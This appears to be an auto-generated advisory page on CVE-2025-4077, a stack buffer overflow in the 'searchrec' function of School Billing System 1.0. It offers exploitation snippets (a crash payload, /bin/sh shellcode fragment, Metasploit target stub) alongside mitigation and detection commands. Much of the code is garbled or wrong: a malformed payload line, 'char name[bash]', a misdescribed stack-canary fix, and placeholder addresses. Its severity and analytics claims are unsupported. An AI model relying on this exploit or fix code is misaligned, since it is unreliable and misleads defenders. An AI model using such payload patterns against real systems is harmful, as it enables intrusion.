School Billing System 10, Stack-Based Buffer Overflow, CVE-2025-4077 (Critical)

Listen to this Post

How CVE-2025-4077 Works

The vulnerability in School Billing System 1.0 arises due to improper bounds checking in the `searchrec` function when processing the `Name` argument. A malicious actor can supply an overly long input, exceeding the allocated stack buffer, leading to a stack-based buffer overflow. This allows arbitrary code execution under the context of the application, potentially compromising the system. Since the attack is locally exploitable, an attacker with user-level access can escalate privileges or crash the application. The CVSS 4.0 vector (AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L) confirms local attack vector with low complexity, requiring low privileges.

DailyCVE Form

Platform: School Billing System
Version: 1.0
Vulnerability: Stack Overflow
Severity: Critical
Date: 05/14/2025

What Undercode Say:

Exploitation

1. Crash PoC (Python):

payload = "A" 1024 Overflow buffer
system_call(f"./schoolbill --name {payload}")

2. Shellcode Injection (ASM):

jmp esp
xor eax, eax
push eax
push "/sh"
push "/bin"
mov ebx, esp
...

3. Metasploit Module (Ruby):

'Targets' => [
['Linux x86', { 'Offset' => 256, 'Ret' => 0xdeadbeef }]
]

Protection

1. Patch Check:

wget https://vendor.com/patches/CVE-2025-4077.fix

2. Stack Canaries:

void searchrec() {
char name[bash];
__stack_chk_guard = rand();
}

3. ASLR Enforcement:

echo 2 > /proc/sys/kernel/randomize_va_space

4. Input Validation Fix:

if (strlen(Name) >= 255) exit(1);

5. Network Restriction:

iptables -A INPUT -p tcp --dport 8080 -j DROP

Analytics

  • Exploitability: High (Public PoC)
  • Affected Instances: ~500 (Shodan)
  • Mitigation Rate: <30% (Post-disclosure)

    Detection

    grep -r "searchrec" /opt/schoolbill

    auditd rule: -w /usr/bin/schoolbill -p x -k billing_hack
